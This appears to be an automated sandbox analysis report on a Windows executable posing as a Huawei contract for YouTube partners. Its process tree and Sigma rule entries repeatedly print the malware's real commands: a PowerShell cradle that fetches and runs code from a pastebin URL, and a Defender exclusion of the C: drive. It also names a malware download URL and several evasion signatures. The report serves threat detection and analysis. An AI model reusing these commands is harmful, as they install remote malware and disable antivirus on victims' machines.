
Windows Analysis Report
[Huawei] Contract for YouTube partners.exe

Overview

General Information

Sample name: [Huawei] Contract for YouTube partners.exe
Analysis ID: 1617339
MD5: dd0b202977b83e0c52c2537616c7a620
SHA1: 2222a2298b601ba778f6b15e6ed93116de5e2662
SHA256: 86cea9c754cf8904e57e345cd6e1af7023c60590c5407a92492a7cf5017c89b7
Tags: exe, WHKzW2nr, user-JAMESWT_MHT

Detection

Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • [Huawei] Contract for YouTube partners.exe (PID: 2356 cmdline: "C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe" MD5: DD0B202977B83E0C52C2537616C7A620)
    • powershell.exe (PID: 5980 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 876 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • csc.exe (PID: 5728 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 1080 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD333.tmp" "c:\Users\user\AppData\Local\Temp\jwryu2yd\CSC4A1A778723A0488D9C81AB4CE7B7E2B.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 5704 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe", ParentImage: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe, ParentProcessId: 2356, ParentProcessName: [Huawei] Contract for YouTube partners.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 876, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe", ParentImage: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe, ParentProcessId: 2356, ParentProcessName: [Huawei] Contract for YouTube partners.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 5980, ProcessName: powershell.exe
Source: Process started; Author: frack113; Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe", ParentImage: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe, ParentProcessId: 2356, ParentProcessName: [Huawei] Contract for YouTube partners.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 876, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems); Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 876, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.cmdline", ProcessId: 5728, ProcessName: csc.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe", ParentImage: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe, ParentProcessId: 2356, ParentProcessName: [Huawei] Contract for YouTube partners.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 876, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe", ParentImage: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe, ParentProcessId: 2356, ParentProcessName: [Huawei] Contract for YouTube partners.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 5980, ProcessName: powershell.exe
Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe", ParentImage: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe, ParentProcessId: 2356, ParentProcessName: [Huawei] Contract for YouTube partners.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 876, ProcessName: powershell.exe
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 876, TargetFilename: C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.cmdline
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe", ParentImage: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe, ParentProcessId: 2356, ParentProcessName: [Huawei] Contract for YouTube partners.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 5980, ProcessName: powershell.exe

Data Obfuscation

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 876, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.cmdline", ProcessId: 5728, ProcessName: csc.exe
Suricata IDS alerts (network traffic)

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-17T19:35:40.469309+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49778 | 104.26.12.205 | 80 | TCP
2025-02-17T19:35:40.970979+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49785 | 208.95.112.1 | 80 | TCP
2025-02-17T19:36:07.249077+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49825 | 89.23.97.214 | 80 | TCP
2025-02-17T19:36:07.262561+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49824 | 89.23.97.214 | 80 | TCP
2025-02-17T19:36:28.657629+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49961 | 89.23.97.214 | 80 | TCP
2025-02-17T19:36:28.659655+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49960 | 89.23.97.214 | 80 | TCP
2025-02-17T19:36:50.028855+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49995 | 89.23.97.214 | 80 | TCP
2025-02-17T19:36:50.030883+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49994 | 89.23.97.214 | 80 | TCP
2025-02-17T19:37:11.386733+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49998 | 89.23.97.214 | 80 | TCP
2025-02-17T19:37:11.402768+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49999 | 89.23.97.214 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-17T19:37:12.000976+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.6 | 50001 | 149.154.167.220 | 443 | TCP
2025-02-17T19:37:12.044300+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.6 | 50002 | 149.154.167.220 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-17T19:35:42.078768+0100 | 1810009 | 1 | Potentially Bad Traffic | 192.168.2.6 | 49792 | 149.154.167.220 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-17T19:35:26.525126+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49706 | 172.67.19.24 | 443 | TCP


AV Detection

Source: http://89.23.97.214/Team/32cv.exe; Avira URL Cloud: Label: malware
Source: [Huawei] Contract for YouTube partners.exe; ReversingLabs: Detection: 24%
Source: [Huawei] Contract for YouTube partners.exe; Virustotal: Detection: 11%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.8% probability
Source: unknown; HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.6:49706 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49792 version: TLS 1.2
Source: [Huawei] Contract for YouTube partners.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250591766.000002B7E9D51000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250619026.000002B7E9D60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Sockets.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248897242.000002B7E9280000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248955580.000002B7E92C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Xml\Release\net8.0-windows\System.Private.Xml.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249795196.000002B7E9680000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250073254.000002B7E9981000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.Primitives.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3253245076.000002B7EB261000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3253056950.000002B7EB090000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.IO.FileSystem.DriveInfo.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245966712.00000277513E1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246764040.000002B7E5F40000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Drawing.Common/Release/net8.0/System.Drawing.Common.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251017895.000002B7E9F11000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250944802.000002B7E9E90000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: Microsoft.Win32.Registry.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3244830292.000002774F971000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249770533.000002B7E9660000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography\Release\net8.0-windows\System.Security.Cryptography.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248833493.000002B7E91C1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248750883.000002B7E9100000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdbSHA256H source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248518064.000002B7E9000000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248575013.000002B7E9051000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.Security.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248518064.000002B7E9000000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248575013.000002B7E9051000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Quic\Release\net8.0-windows\System.Net.Quic.pdbSHA256 source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251604593.000002B7EA231000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251630855.000002B7EA250000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Principal.Windows.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245786403.0000027751380000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245744128.0000027751351000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.NonGeneric\Release\net8.0\System.Collections.NonGeneric.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251410435.000002B7EA1B1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251433635.000002B7EA1C0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net8.0\System.Collections.Concurrent.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248611872.000002B7E90A0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248658900.000002B7E90C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net8.0-windows\System.Net.NameResolution.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249010025.000002B7E9301000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249032962.000002B7E9310000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249620096.000002B7E95D0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249669770.000002B7E9601000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Drawing.Common/Release/net8.0/System.Drawing.Common.pdbSHA256 source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251017895.000002B7E9F11000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250944802.000002B7E9E90000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Linq.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249620096.000002B7E95D0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249669770.000002B7E9601000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248252782.000002B7E8F30000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246966709.000002B7E60C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.ComponentModel.EventBasedAsync.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251136685.000002B7E9FB0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251111684.000002B7E9FA1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.DataContractSerialization.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Collections.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249143432.000002B7E9341000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249169651.000002B7E9360000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Private.CoreLib.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdbSHA256 source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250716435.000002B7E9DC1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250642336.000002B7E9D70000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Loader\Release\net8.0\System.Runtime.Loader.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249503089.000002B7E9590000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249428276.000002B7E9571000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Uri\Release\net8.0\System.Private.Uri.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248471233.000002B7E8FD0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248337268.000002B7E8F51000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net8.0-windows\System.Net.Primitives.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248225564.000002B7E8F11000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248179022.000002B7E8EF0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Private.Xml.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249795196.000002B7E9680000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250073254.000002B7E9981000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Collections.Specialized.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250803085.000002B7E9E20000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250777948.000002B7E9E11000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.ReaderWriter\Release\net8.0\System.Xml.ReaderWriter.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249194705.000002B7E9380000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248294715.000002B7E8F41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Quic\Release\net8.0-windows\System.Net.Quic.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251604593.000002B7EA231000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251630855.000002B7EA250000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249567499.000002B7E95B1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249594148.000002B7E95C0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Runtime.Serialization.Primitives.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249474322.000002B7E9581000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249525013.000002B7E95A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246009062.00000277513F1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246783735.000002B7E5F50000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdbSHA256 source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250591766.000002B7E9D51000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250619026.000002B7E9D60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Claims.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Text.RegularExpressions.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250422129.000002B7E9C80000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250523289.000002B7E9CE1000.00000020.00001000.00020000.00000000.sdmp
